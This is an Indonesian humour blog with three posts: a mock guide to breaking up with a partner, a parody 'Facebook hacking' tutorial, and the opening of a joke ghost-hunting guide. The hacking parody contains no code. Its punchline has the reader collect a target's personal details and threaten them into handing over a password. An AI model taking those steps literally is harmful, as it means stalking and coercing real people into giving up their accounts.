Cara memutuskan pacar

putusin pacar
Halo emosi muda,.. Assalamualaikum. Bertemu lagi dengan saya Rumput Dan Kerikil alias RDKzero3 alias Ahmad Raj alias Mckenzy alias 0101***ier :p

Ya, memang nama saya banyak aliasnya, maklumi saja karena saya memiliki banyak tempat bernaung khusus baik secara umum maupun rahasia, dan nama alias saya ditempatkan sesuai dengan situasi, kondisi dan domisili yang biasa disingkat dengan sikondom.

Hmm.. Setelah beberapa hari vakum blogging akhirnya saya menulis artikel ini yang mungkin sedikit nyentrik atau ganjil atau bahkan bisa jadi gila, ya gila bagi sebagian orang gila, tapi saya tidak gila, walau ada yang bilang saya gila, bagi saya yang mengatakan saya gila ya saya anggap dialah yang gila haha, saya hanya berusaha menjadi super professional, soalnya jika sekedar professional saja itu sudah terlalu mainstream bagi saya hihihihi. Nah artikel ini dikhususkan bagi anda yang ingin, akan atau hobi untuk memutuskan hubungan illegal pranikah yang biasa disebut pacaran dalam bahasa indo, entah darimana istilah ini pertama kali dimulai tapi hal ini menjadi bagian dari pustaka bahasa indonesia saat ini. Okay..!

Disini akan dijabarkan tehnik, trik, tips dan masukan khusus untuk memutuskan hubungan pacaran, dibagi menjadi tiga bagian yakni;

Cara pemula/Beginner
Ultimate/Premium
Expert/professional

Nah langsung saja kita mulai bahasan ini agar anda tidak bosan, soalnya saya khawatir jika pembaca mulai bosan maka akan menimbulkan efek samping berupa kambuhnya sakit kepala atau yang paling ekstrim bisa menghancurkan atau membakar rumah sendiri, ya hal tersebut zaman sekarang memang sudah lumrah. Banyak tuh kita baca di koran-koran tentang orang-orang yang suntuk dan kemudian mulai melakukan hal-hal menyenangkan seperti diatas. Jadi kita start aja terus yaaa....

Hal-hal yang dibutuhkan untuk memutuskan hubungan pacaran.

1. Tempat/Lokasi khusus.
Tempat merupakan suatu hal yang mesti anda persiapkan sebelum memutuskan hubungan pacaran, karena hal ini sangat vital dan mendukung anda untuk memutuskan dia, kebanyakan orang zaman sekarang memutuskan hubungan pacaran dengan memakai media social seperti facebook, twitter, whatsapp dll, saya mengkategorikan golongan seperti ini sebagai kategori pemutus tingkat pemula, nah soalnya bagi pemutus hubungan pacaran berlevel tinggi akan memilih tempat yang lebih strategis dan bernilai drama yang tinggi, seperti; persimpangan jalan, kuburan, rel kereta api atau bahkan diangkasa sambil terjun payung. Beberapa orang tidak akan menyatakan putus pada pacarnya hingga menemukan tempat yang layak putus, semata-mata agar putusnya suatu hubungan pacaran terlihat anggun dan menyedihkan serta berada pada tempat yang memang mendukung untuk segera putus :3

2. Kata-kata/Ucapan.
Suatu kata akan bernilai dan mendalam jika dinyatakan dengan tepat, karena kata putus jika diucapkan tanpa tepat sasaran bisa menyebabkan salah tafsir, anda bisa bayangkan seandainya anda memutuskan pacar anda dengan kata-kata yang kurang tepat maka yang terjadi hanyalah anda yang diputuskan! Nah lucu kan jadinya? Seorang pemutus lebih baik dari yang diputus. Banyak kasus kita lihat seperti di media sosial dimana orang-orang memutuskan suatu hubungan hanya dengan dua kata yakni “Kita putus”. Hmm.. bolehlah jika anda memutuskan dengan kata-kata tersebut jika anda belum mengetahui, namun jika anda ingin tampil professional anda bisa menggunakan kata-kata yang lebih tepat, seperti; “Aku memutuskan kamu saat ini dengan disaksikan ribuan camar yang menari di senja sepi” (Ehem,, terlalu puitis -_-). Atau bisa juga begini; “ Sayang.. maafkan aku, aku khawatir kamu bisa terbunuh jika terus bersamaku, karena aku seorang psikopat etc etc “. Intinya improvisasi dan gunakan imajinasi anda dalam memutuskan hubungan pacaran.

3. Sebab Putus/Alasan.
Sebab merupakan hal yang utama untuk memutuskan hubungan pacaran, karena jika putus tanpa sebab maka hal itu hanya terjadi pada orang yang mengalami ketimpangan psikologi, sebab-sebab putus mungkin disebabkan oleh rasa bosan, selingkuh, menyesal, harta, agama, rupa, amnesia atau mungkin karena taubatan nasuha karena jelas agama melarang pacaran. Beberapa orang mengatakan dengan jelas kepada calon yang akan diputuskan secara transparan, namun beberapa orang juga pintar memainkan peran drama dengan menghadirkan alasan yang dibuat-buat. Umumnya para pemutus pemula sering memutuskan pacarnya seperti ini; “Maafkan aku, kita harus putus karena kamu terlalu baik untukku” itu adalah sebab paling umum dan paling ngetren yang digunakan para pemutus pemula, namun jika dilakukan secara professional hendaknya sebab-sebab putus mestilah masuk akal dan konkrit serta yakinkan calon mantan anda dengan alasan-alasan yang menyebabkan harus segera putus!.

Okay.. Setelah anda mengerti dan memenuhi syarat-syarat putus seperti diatas, maka berikut dibawah ini adalah tehnik-tehnik dalam memutuskan pacar secara fantastis dan dibagi dalam tiga bagian.

Tempat/lokasi
a. Pemula: Hendaknya memilih tempat yang bernuansa tenang seperti di kafe atau warung nasi padang atau bisa juga di emperan toko, lupakan memutuskan pacar via facebook atau SMS karena hal itu sudah sangat umum. Tentunya anda tidak ingin dicap sebagai pemutus berlevel umum dan bermutu rendahan bukan? Carilah tempat yang beda!

b. Ultimate: Di level ini anda bisa memutuskan pacar anda di tempat-tempat seperti kuburan, pasar daging, kantor pajak bahkan kantor polisi. Intinya dilevel ini tempat yang anda pilih tentunya selalu bernuansa tidak mengenakkan dan malas untuk diingat, nah tempat seperti ini akan sangat membantu anda tanpa rasa ragu lagi.

c. Expert: Nah di level professional ini anda bisa memutuskan pacar anda sembari membacakan puisi, bernyanyi, berselancar, berburu babi hutan, balapan liar bahkan sambil terjun payung dan bisa juga saat mencoblos surat suara saat pemilu. Intinya dilevel ini seorang pemutus expert akan memutuskan pacarnya ditempat-tempat yang bernuansa ramai, keren, hebat, wow, mantap, ajib dan luar biasa. Pemilihan tempat seperti ini akan mengakibatkan putusnya suatu hubungan dengan cara yang sulit untuk dilupakan. Karena pihak yang diputuskan biasanya akan merasa sangat takjub!

Kata/Ucapan
a. Pemula: Hindari kata-kata “Kita putus!” atau “Kita bubar!”, karena kata-kata putus seperti itu sangat tidak keren. Usahakan memutuskan pacar anda dengan menggunakan kata-kata yang agak berkelas, misalnya: “Aku ingin semua ini berakhir” atau “Ada baiknya kita berpisah saja” bisa juga begini; “Sudah saatnya kita berpisah sayang”. Perhatikan bedanya! Lebih berkelas bukan? +_+

b. Ultimate: seorang pemutus ultimate akan memutuskan pacarnya dengan kata-kata yang berkualitas dan berstandar internasional, pemutus ultimate tidak akan membiarkan cara putusnya dengan kata-kata bermutu rendah karena mereka tidak ingin kata-kata tersebut tergores dalam kisah hidupnya. Biasanya para pemutus ultimate memutuskan pacar dengan kata-kata seperti ini; “Kekasihku, ada siang dan ada juga malam. Ada pertemuan tentu ada perpiasahan, maka izinkan aku meninggalkanmu” atau “Wahai cinta.. jika cinta ini selalu manis tentu tak salah jika aku membumbuinya dengan sedikit rasa pahit, dan rasa pahit itu adalah aku akan memutuskanmu” Wow sangat keren sekali! Kaum pemutus pacar level ultimate memang sangat sulit dilupakan karena cara mereka yang berbeda dan bisa jadi tergolong LUX.

c. Expert: Di level high ini para pemutus professional biasanya akan menggunakan kata-kata yang luar biasa menakjubkan, mereka sudah sangat terlatih dalam memutuskan suatu hubungan pacaran, hal ini cuma bisa diraih dengan pengalaman memutuskan yang sudah sangat sering, tentunya sudah tidak terhitung berapa banyak juga yang sakit hati karenanya. Para pemutus expert tidak akan segan-segan dan tidak berfikir dua kali untuk memutuskan pacarnya, bagi mereka pacaran hanyalah buang-buang waktu dan mengikat kebebasan saja, namun beberapanya tetap saja mereka berpacaran walau hanya untuk diakhiri, beberapa pemutus professional bahkan bersaing memecahkan rekor putus terbanyak. Biasa di level expert ini mereka memutuskan pacar dengan kata-kata sederhana namun berkesan tegas, ketus dan mantap, misal: “Hari ini kita mesti putus!” Perhatikan..! Begitu singkat, padat dan luar biasa, bisa juga seperti ini; “ Hahaha elo,. gue end! ” atau bahkan mereka tidak lagi menggunakan kata-kata tetapi malah menggunakan bahasa isyarat atau selembar kertas bertuliskan “ Selamat tinggal bye bye “! Waaahhh...! Keren sekali.

Sebab/Alasan.
a. Pemula: Jangan sesekali menggunakan alasan umum seperti ini; “Kamu terlalu baik untukku” atau “Dia lebih pantas untuk kau miliki”,. Well dua alasan diatas menempati most of record the reason for break up alias alasan paling sering digunakan untuk putus, jelas karena dua alasan diatas merupakan alasan paling omong kosong yang pernah ada dalam sejarah pemutusan sang pacar. Sebagai pemutus beginner/newbie ada baiknya anda mengubah alasan putus anda semisal; “ Sayang.. kita tidak cocok karena impian kita berbeda “ atau “ Maafkan aku meninggalkanmu karena aku malu dengan keadaanku “ atau malah bisa jadi “ Kasih... kita berpisah semata-mata karena orangtuaku telah menjodohkanku “ Disini anda bebas berimprovisasi dan pastikan alasan anda masuk akal!.

b. Ultimate: para pemutus level ultimate ini biasanya menggunakan alasan yang lebih mengarah kepada sisi personal dari sang pacar, biasanya kaum ultimate akan mencari-cari alasan putus dengan mengungkit-ungkit kekurangan atau keterbelakangan mental sang pacar. Menurut mereka exploitasi alasan jenis ini sangat layak digunakan dalam tehnik pemutusan pacar baik skala standar couple maupun pemutusan pacar skala masal. Kita bisa melihat contoh-contoh alasan putus seperti berikut; “ Kita putus karena kamu egois “ atau “ Jujur saja aku mulai muak dengan sikapmu yang seperti parasit “ bisa juga “ Tahu gak kenapa kita bubaran? Itu karena kamu matre! “ beberapa malah mengatakan “ Kita putus karena kamu posesif, kasar dan nafsuan “ nah intinya di level ini para pemutus ultimate akan mencari alasan dengan sebab kekurangan dan sikap buruk sang pacar.

c. Expert: Inilah setinggi-tingginya level kemampuan memutuskan hubungan pacaran, yakni professional. Di level teratas ini biasanya mereka memutuskan hubungan pacaran dengan menggunakan alasan paling konkret, masuk akal, jenius bahkan sulit untuk dibantah. Kejujuran menempati porsi utama sebagai alasan memutuskan sang pacar namun dengan cara yang sangat indah dan menawan juga cenderung unik serta mengerikan, beberapa alasan yang digunakan para pemutus professional adalah; “Kekasih, aku menemukan dirimu dalam dirinya.. justru karena aku begitu mencintaimu maka aku memutuskanmu untuk aku bisa bersamanya, karena sosok dirimu dalam dirinya begitu indah“ Coba anda amati kata-kata diatas! Sebuah alasan dusta yang sangat jenius sekali bukan? Ada juga contoh alasan seperti ini: “ Aku tak bisa lagi bersamamu, kita harus putus tanpa alasan! Pokoknya putus titik!“ mengerikan sekali..! Hiii bahkan kaum pemutus expert bisa memutuskan pacar tanpa sebab sama sekali. Namun ada satu alasan yang paling menarik yang saya ketahui, seperti ini; “Aku memutuskanmu karena aku tak ingin kita berbuat dosa,. Aku lakukan ini karena aku mencintaimu! Aku memutuskan hubungan kita ini namun aku akan segera melamarmu“. Oooh sangat mengharukan sekali T.T, inilah sebaik-baik alasan yang saya ketahui karena sarat dengan kedewasaan dan pengendalian diri.

Demikianlah ladies and gentlemen artikel saya tentang tehnik dan trik memutuskan hubungan pacaran, untuk selanjutnya tentu anda bisa mengkreasikan dengan imajinasi atau mengembangkannya menurut versi anda sendiri, saran penulis agar anda tidak membuat orang sakit hati. Jika pribadi anda belum siap maka hindarilah mencari bencana yang berhujung pada sakit hati lantaran sebuah hubungan tanpa komitmen resmi. Jika anda telah matang maka menikahlah! Arigato dan Wassalam.

Sadap sandi facebook 1000% sukses

funny facebook

Dear Ladies & Gentlemen.. Anda sedang berada dalam zona “How to Hack facebook 100% successfull, the new secret hacking facebook professional ultimate foolish edition” yup tidak salah lagi karena dalam postingan kali ini saya akan memberitahu anda cara mengetahui password facebook orang lain, bisa jadi milik teman, pacar, musuh, selingkuhan, papa, mama, sepupu atau bahkan milik presiden dan password pemilik facebook sekaligus yakni Mark Zuckerberg. Anda tentu bertanya-tanya bagaimana hal itu bisa dilakukan? Tentu saja hal itu bisa dilakukan oleh siapa saja dan dimana saja asalkan anda punya tekad dan keberanian juga semangat ( harap kepalkan genggaman tangan anda sambil berkata YES.. AKU BISA! ).

Nah beberapa waktu lalu mesin pencari google merilis bahwa pencarian terbanyak di google adalah “how to hack facebook account atau bagaimana cara meng-hack akun facebook?” Yup tentu saja hal ini memicu tanda tanya besar di mana saat ini era hedonisme membuat banyak orang saling tidak percaya sehingga memicu untuk mengetahui lebih dalam tentang hal apa saja dan apa yang orang lakukan di dunia maya khususnya facebook. Harap sabar! Karena selangkah lagi anda akan mengetahui rahasia terbesar untuk sukses menjadi hacker facebook professional ultimate insane. Dalam postingan kali ini saya tidak akan to the point namun saya akan lebih banyak berbasa-basi karena saya sedang membicarakan hal yang serius! Ya sangat serius karena ini menyangkut masalah privasi orang banyak, dan bug temuan saya ini telah saya laporkan kepada administrator pengelola facebook dan hanya dalam hitungan menit mereka langsung membalas laporan saya via email dan hanya berisi dua kata saja, yakni “ Awesome Idiot” dan membatalkan reward US$.1000 bagi penemu celah keamanan facebook.

Well.. Saya tidak kecewa dengan facebook yang tidak mengakui temuan saya tersebut karena cukup jelas memang bahwasannya facebook tidak mampu untuk menutupi celah vulnerable ini, bisa jadi karena mereka tidak memiliki kemampuan dalam hal ini, atau bisa jadi mereka takut dan gentar dengan kehebatan saya :D, ehem sulit memang untuk mengakui kelebihan orang lain terutama kelebihan saya, ya saya juga memaklumi karena memang jarang-jarang ada orang seperti saya yang ganteng, pinter, baik hati, suka ngopi, begadang dan baca koran ditepi kali serta sesekali juga hobi menganggu monyet peliharaan tetangga yang suka teriak-teriak jika saya lewat, ya mungkin pengaruh aura gemilang saya yang menyebabkan terjadinya gangguan medan magnet di sekitar saya lewat sehingga mempengaruhi kinerja pencernaan monyet tersebut. :))

Nah.. Ladies dan gentlemen tahu gak jika saat ini pengguna facebook menembus 1 milyar pengguna, wow bayangkan saja jika anda mampu meng-hack pengguna facebook siapa saja tanpa kecuali, tentu anda-anda akan dijuluki raja atau ratu facebook, wah pastinya akan terlihat keren sekali bukan? Orang-orang akan datang kepada anda berbondong-bondong untuk meminta anda ngehack facebook milik teman mereka atau sekedar mengintip inbox pacarnya, atau mungkin mengupload content illegal di facebook musuh anda demi menjatuhkan lawan politik misalnya, sehingga musuh anda tersebut terjerat hukum dan akhirnya bunuh diri karena merasa difitnah atau minimal membunuh temannya sendiri dengan tanpa alasan. Nah berawal dari ide-ide tersebut maka saya pribadi dengan segala kemampuan ajaib saya dan juga mewakili dari planet asal saya dengan resmi saya akan mengajari semua pengunjung setia blog tercinta kita ini untuk mengetahui secara persis dan detil tentang bagaimana membuat adonan kue tar untuk lebaran kelak hehehhe. Canda dunk, maksud saya untuk mengetahui tehnik, trik dan tips ajaib hack akun facebook! Nah tentu saja untuk melakukan hal terhebat seperti ini anda harus memahami konsekuensi dari perbuatan anda, anda juga mesti memperhitungkan segala resiko dan manfaat yang anda dapat dari hal tersebut, termasuk memperhitungkan gejala dan efeknya secara ekonomi, sosial, budaya, lingkungan, politik juga pengaruhnya secara langsung terhadap atmosfer serta habitat flora dan fauna ditempat anda tinggal saat ini. Perhatikan! Sebenarnya hack facebook itu sangat mudah, bahkan lebih mudah daripada membalikkan telapak tangan justin bieber atau lady gaga. Kenapa saya bisa mengatakan hal itu begitu mudah? Ya tentu saya tidak mengatakan hal ini secara main-main karena saya sendiri sudah mempraktikkan hal ini, sehingga saya berani menjatuhkan vonis bahwa hack facebook itu begitu mudah bahkan sangat sepele, dan saking sepelenya saya melihatnya cuma dengan sebelah mata.

(Note: Untuk melihat dengan sebelah mata anda butuh kain penutup mata ala bajak laut seperti di film-film klasik pirates).

Jadi sebelum anda melakukan hal tersebut saya sarankan anda untuk mempersiapkan mental anda sekuat mungkin karena efek menghack facebook memang bisa menyebabkan jantung anda bergejolak. Ciri-cirinya: jantung berdebar-debar, tekanan darah tidak stabil, retina mata membesar, telapak kaki dan otak anda kesemutan dan bahkan bisa menyebabkan berubahnya persepsi anda ketika anda mengetahui apa yang seharusnya tidak anda ketahui. Seperti misalnya tiba-tiba anda berubah menjadi sosok menyeramkan disaat anda mengetahui ternyata kekasih anda berselingkuh dengan teman kecil kakek anda, atau mungkin anda akan terkejut saat anda membaca inbox milik perdana menteri suatu negara di timur tengah yang menyebutkan bahwa di handphonenya masuk sebuah SMS mama minta pulsa dari indonesia. Hal itu memang sering terjadi dimana hal-hal aneh banyak menghinggapi pengguna facebook. Namun hal ini tidak asing lagi dimata hacker professional karena memang mereka sudah terbiasa untuk mengetahui data-data rinci milik seseorang atau suatu perusahan, bahkan mereka sering mengunduh data illegal seperti ukuran bra milik jendral bintang tiga di suatu negara komunis, ada juga yang menyadap pembicaraan telpon antara orang bisu dan orang tuli, bahkan konon ada hacker yang menghack komputernya sendiri hingga seluruh datanya terhapus dan hardisknya terformat dengan begitu sempurna.

So.., ya sudah langsung saja saya jabarkan tehniknya dengan rinci, karena saya juga sudah mulai bosan ngetik begini begitu, ya karena saya orangnya memang suka begitu, walau disisi lain saya juga suka jalan-jalan ke pegunungan, kepantai atau sekedar jalan-jalan tengah malam saat saya suntuk. Soalnya saya suka menghindari suntuk dengan cara begitu, ya daripada saya suntuk, terus daripada saya mulai melakukan adegan terbang ala Jet Lee di film-film silat kan mendingan saya jalan-jalan. Nah pernah ni ya saat saya jalan-jalan terus saya malah bertemu dengan penjual obat di kaki lima yang konon punya kemampuan gaib seperti meramal, kebal dan kemampuan-kemampuan lainnya yang layak dipraktikkan para dukun atau bahasa populernya abnormal (antonim paranormal). jadi waktu saya ketemu di kaki lima (walau ditempat tersebut tak ada seorangpun yang memiliki kaki lima, bahkan semut saja berkaki enam) dengan penjual obat tersebut dengan percaya dirinya dia berkoar-koar bahwa disa bisa menyembuhkan penyakit apa saja! Wow hebat seukali dia +_+

Terus itu si penjual obat memandangi saya dengan pandangan tumpul. Saya sempat berkata dalam hati, ini tentu si penjual obat merasa gentar dengan saya, karena saya yakin aura saya yang berwarna ungu keemasan membuat frequensi kemampuan gaib si penjual obat menjadi tidak stabil. Gejala ini disebut juga dengan istilah jamming sinyal gaib. Nah akibatnya itu si penjual obat langsung mendatangi saya dan menyalami saya seolah-olah bertemu dengan guru besar perguruan silat di film-film kungfu. Ya dengan kebesaran hati dan kebijaksanaan saya maka saya langsung membalas salam si penjual obat itu dengan salam khas NAZI saat perang dunia kedua tempo dulu, sambil menaikkan tangan setinggi kepala saya berujar “Hell Hitler” kemudian sambil cengengesan si penjual obat mengeluarkan sebuah benda merah kecil, ya sebuah batu cincin katanya konon memiliki power gaib untuk pengasih lawan jenis dan wibawa juga ditakuti banyak orang, dan katanya sangat cocok dipakai oleh orang yang tampan lagi bersenjata. Dan saya pun tidak mau kalah, langsung saja saya keluarin batu pegganjal body sepeda motor saya (Note: Body sepeda motor jika tidak diganjal batu maka sering mengeluarkan suara berisik persis suara orang ketelan tanduk kambing). Nah saya bilang sama sipenjual obat tersebut bahwa batu saya ini lebih dahsyat luar biasa karena mampu membuat penelannya mati mendadak! Spontan saja si penjual obat merasa teriris-iris hatinya dan merasa kalah ditempat! Dan tanpa basa-basi si penjual obat meminta agar saya sudi menjual batu itu kepadanya, tapi apa kepalang saya sudah terlanjur muak dengan batu tersebut ya sudah saya kasi aja gratis. Saya bilang sama sipenjual obat itu kalo dia mau yang lain sama saya masih banyak. Beli tiga gratis satu karena disebelah rumah saya juga banyak batu bekas ngecor tiang mesjid berserakan. Kan lumayan bisa dijual buat obat stress. Baik stress karena cinta,karena pekerjaan atau stress karena monyet tetangga lepas dari kandang terus menggigit jemuran dan baju-baju kesayangan anda yang menyimpan kenangan tempo dulu disaat anda pertama kali merayu kekasih anda untuk kembali setelah ianya berselingkuh dengan enam pria sekaligus.

Waduh..! kok bahasan kita malah lari ke jualan obat ya? Okelah saudara-saudara setanah air saya tahu anda sudah tidak sabar untuk segera mengetahui tehnik hack facebook metode tercanggih dan ter-elit yang saya punya. Tapi anda mesti berjanji dengan beberapa syarat yakni; Anda dilarang meng-hack facebook saya, jangan meng-hack facebook milik ariel sharon karena dia memang tidak pernah menggunakan facebook, dan setelah anda mengetahui tehnik ini maka anda wajib menulis di wall anda bahwa saya seorang yang ganteng,hebat dan jago walau anda semua mungkin tidak meyakininya, tapi ya kenyataan memang sulit diterima, dan jika perlu anda bisa menambahkan sedikit embel-embel seperti yang terhormat rumput dan kerikil atau professor RDK atau apa sajalah yang terdengar keren dan pantas bagi saya hihiih. Bukan maksudnya saya ingin terlihat hebat atau gila pujian tapi semata-mata agar anda sadar bahwasannya segala puji hanya bagi Allah semata dan saya hanya makhlukNya yang rendah dan hina dina. ;)

Nah,.setelah anda memenuhi semua syarat diatas maka tak ada salahnya anda untuk segera mempersiapkan beberapa hal sebagai alat utama untuk hack facebook;

1. Sebuah laptop/PC/Handphone/tablet atau apa saja yang bisa mengakses internet, nah jika sebuah kulkas pun bisa mengakses internet maka silahkan anda pakai. Jika tak ada satupun yang anda miliki maka itu derita anda. Dan sudah sepantasnya anda untuk mencari sebuah alat yg bisa internetan. Terserah mau pinjem kek, mau beli kek atau sewa, asal jangan anda mencuri karena bisa menyebabkan kekecewaan berat bagi si pemiliknya, dan tentu anda tak ingin kecurian juga bukan? Nah jika anda merasa kecurian itu menyakitkan maka janganlah anda mencuri. Tapi jika anda merasa kecurian itu menyenangkan ya harap undang saya saja untuk mencuri barang-barang anda, dan saya menyatakan selalu siap bagi siapa sahaja yang mengimpikan atau terobsesi untuk dicuri barang-barangnya.

2. Akses internet. Nah ini juga wajib anda miliki sebelum anda meng-hack facebook karena jika tanpa akses internet berarti ini cuma omong kosong doank ya kan? Anda bisa menemukan akses internet via provider sim card handphone anda atau bisa juga berlangganan lewat perusahaan jasa komunikasi atau bisa juga anda mendatangi warnet, intinya anda mesti mendapatkan akses internet. Dan jika anda sedang berada dalam keadaan no internet access maka harap ditunda dulu trik ini hingga waktu yang ditentukan. Mungkin anda bisa menundanya hingga minggu depan, bulan depan atau tahun depan. (Beberapa orang mempercayai bisa menemukan akses internet di kehidupan selanjutnya -_-). Nah jika akses internet sudah anda miliki maka kita ke tahap berikutnya.

3. Target. Yup anda harus punya target karena tanpa target berarti anda hanya berusaha meng-hack untuk kemudian menjadi pusing terus mengalami gagal ginjal dan berpotensi mengalami gangguan system saraf sehingga memicu tekanan dan depressi berat. Tentunya anda tidak ingin mengalami semua itu ya kan? Jika anda memang menginginkan semua itu terjadi maka saya meragukan kenormalan anda. Anda harus memilki target minimal satu orang, dan target termudah dalam trik ini tak lain dan tak bukan adalah akun facebook anda sendiri. Yup,, meng-hack akun sendiri adalah yang termudah sepanjang yang saya ketahui. Cukup dengan memasukkan username dan passwordnya yang masih anda ingat dan... Taaa.. Raaaa... Anda telah berhasil menjadi hacker facebook versi ultimate!

4. Segelas kopi dan sepiring kue, Nah kopi dan kue juga merupakan perbekalan vital dalam meng-hack facebook, karena kedua hal itu memberikan anda dukungan semangat dan membantu fikiran anda untuk lebih lempang, nah bayangkan jika anda berusaha meng-hack facebook dalam keadaan lapar..?? Pastinya anda tidak akan konsentrasi atau malah anda akan meninggalkannya begitu saja karena makan adalah prioritas utama dalam kehidupan. Kopi akan memberikan zat kafein yang bersifat semi adiktif sehingga anda akan lebih kuat bergadang dan kadang kala menyebabkan asam berlebih dalam lambung anda, dan jika sudah sangat berlebih maka anda berpotensi untuk membuka usaha penyedia zat asam, baik itu zat asam cuka, asam amino dan asam digunung garam dilaut dalam tempurung bertemu jua. Sepiring kue membantu anda untuk menjadi lebih gemuk juga narsis dan setidaknya tidak terlihat langsing seperti saya yang memang terlihat proporsional walau bukan kamera face. :D

Nah setelah semua hal tersebut dipenuhi maka selanjutnya anda mesti memahami kriteria dan spesifikasi hacking, mungkin anda pernah mendengar tentang DDOS attack, malware trojan, exploit console command, Directory Transversal, PHP exploit, Bruteforce, SQL injection, XSS persistence injection atau Local File Intrussion atau bahkan RFI yang kepanjangan dari Remote File Inclusion dan segudang tehnik hacking lainnya, namun kali ini kita akan menggunakan tehnik tertinggi dalam dunia hacking yakni Social Engineering, yakni tehnik hacking yang tidak memanfaatkan kelemahan suatu system namun memanfaatkan kelemahan pengguna system itu sendiri, dengan cara bersosialisasi dengan targetnya, mungkin bisa berupa phising atau tehnik memancing target, spoof DNS atau membodohi user dengan membelokkan traffic, atau bisa juga dengan rayuan manja seorang gadis mempesona yang meminta anda untuk mengecek isi flashdisknya yang ternyata didalam flashdisk tersebut sudah berisi trojan si pencuri password. Nah setelah anda memahami beberapa istilah menyimpang tersebut maka anda juga mesti memahami bahwa social engineering terbagi dalam tiga bagian. Yakni;
  1. Social Engineering pure, yakni tehnik sosiallisasi murni dengan membodoh-bodohi dan memanfaatkan ketidaktahuan atau kelalaian user itu sendiri.
  2. Social Begging, yakni tehnik mendapatkan akses dengan cara memohon, menghiba, mengemis akses dengan segala trik tipu-tipu ala sandiwara drama korea.
  3. Social Tempering, atau tehnik mendapatkan akses dengan kekerasan atau pemaksaan. Bisa berupa ancaman bom, ancaman penculikan atau teror bahkan ancaman pisah ranjang.
    Nah, namun cara yang kita gunakan kali ini adalah Social Tempering yakni tehnik mendapatkan akses pengguna facebook dengan cara kekerasan, karena persentase keberhasilan tehnik ini diatas 108%. tehnik ini populer dikalangan Agen-agen rahasia seperti CIA, FBI, NSA, Mossad, juga sering dipraktikkan oleh para pelanggar HAM baik itu militer, sipil bersenjata, polisi jahat, preman, genk motor, germo, teroris dan kelak anda sendiri jika anda bersedia dengan senang hati mempraktikkan tehnik super jenius ini :))
    Ehem.. Dengan bangga hati saya mengabarkan kepada anda semua bahwa sayalah yang pertama sekali menemukan istilah tehnik menyimpang ini, memang sebenarnya tehnik ini sudah dilakukan ribuan tahun lalu hanya saja mereka belum memiliki istilah untuk semua perbuatan illegal tersebut, jadi ya anda mesti ketahui semua itu heheheh.
    Okay langsung saja ladies dan gentlemen yang sudah tak sabar untuk meng-hack facebook, segera ikuti langkah-langkah berikut ini;
    1. Tentukan target anda, dan gunakan Gathering Information (Istilah hacker untuk mengumpulkan segala informasi tentang target) bisa berupa nama lengkap, alamat rumah, anggota keluarga dan jika perlu hobi dan jam makan si target anda mesti ketahui bahkan ukuran celana dalamnya jika perlu.
    2. Cari dan temukan posisi target anda, setelah anda menemukan target anda maka selangkah lagi anda berhasil meng-hack facebook! Setelah anda berhasil menemukan sang target maka tunggulah saat yang tepat untuk melakukan aksi keren anda. Bisa jadi menunggu hingga keadaan menjadi sepi yang indah dan menawan hati. Kemudian jika keadaan sudah mantap maka langsung saja kita melangkah ke step selanjutnya.
    3. Tangkap target anda dan paksa target anda untuk memberikan password facebooknya buat anda, tentunya mereka tidak akan memberikan begitu saja kecuali sudah berada dibawah tekanan dan ancaman.
    Anda bisa mengancam mereka misalnya seperti ini;
    - “Berikan password facebookmu atau kau aku santet!”
    - “Pilih berikan password facebookmu kepadaku atau nyawamu tidak melayang”
    - “Beri password facebookmu kepadaku segera atau kuadukan kepada orang tuamu bahwa kamu sudah berani ciuman dengan pacarmu”
    Nah semua ancaman itu bisa anda improvisasi sesuai keadaan dan sesuai dengan gathering information yang anda dapat sebelumnya. Tehnik ini saya jamin 1000% akan berhasil jika tekanan yang anda beri cukup kuat, mereka akan sukarela memberikan passwordnya kepada anda, karena mereka akan berfikir apalah arti sebuah akun facebook ketimbang kena timpuk pake sepatu anda.
    Ada juga cara paling efektiv agar target anda mau berbicara, yakni dengan menggelitiki bagian tubuh yang paling membuat geli, bisa jadi di daerah perut, ketiak atau di telapak kaki, trik ini selalu 100% ajib dan sukses. Karena mungkin banyak orang yang tahan dalam menahan rasa sakit, rasa perih, ujian, cobaan ataupun musibah. Tapi belum pernah ada orang yang mampu menahan rasa geli lantaran digelitikin.
Warning: Kelemahan tehnik ini adalah jarak, misalkan anda ingin meng-hack akun facebooknya milik orang spanyol, pastinya anda butuh dana besar untuk terbang menuju negaranya demi mengancam target yang dimaksud.., belum lagi anda mesti belajar bahasa spanyol seperti sinyora, sinyorita, hasta la vista da kampreto.

Attention: Dengan membaca tutorial ini maka anda sudah setuju untuk tidak menggunakan tehnik ini kecuali anda sudah tidak waras, karena tehnik ini rentan dengan pelanggaran hukum, baik hukum adat, hukum sosial, hukum rimba dan hukum Archimedes juga hukum Newton. Anda bisa ditangkap dengan tuduhan melakukan ancaman paling menyenangkan, dan kemudian akan dikirim ke dalam penjara untuk bermalas-malasan sembari melakukan aksi selfie dengan berpose bersama penjahat-penjahat kelas kakap lainnya. Well.. Tutorial selesai dan bye bye. Selamat menikmati hacking facebook.

Baca Juga; The Social Engineering

WARNING:Panduan lengkap cara menangkap hantu LOL


menangkap hantu
Hati-hati pembaca. Pertama-tama, menangkap hantu tidak seperti meletakkan kue dan menunggu sesuatu datang dan kemudian melihat sekilas saja. Mencoba untuk menangkap hantu bisa sangat berbahaya bagi anda. Efek sampingnya bisa:

Perasaan dihantui secara persisten
skizofrenia
stress
déjà vu
.... Dan bahkan kematian :O

Panduan lengkap untuk Penangkapan Hantu

Jika Anda masih membaca ini, selamat datang di The Foremost Comprehensive Field Guide to Sensing, Locating and Capturing that Spooky Specter.. Anda tidak akan berada di sini jika Anda tidak percaya pada hantu dan belum dihadapkan dengan perasaan semacam dihantui. Namun, jika Anda tak kenal takut dan berani keluar mencari hantu, pastikan untuk memeriksa rumah-rumah tua seram, kuburan, atau tempat-tempat yang ditinggalkan yang biasanya menjadi sarang beradanya hantu.

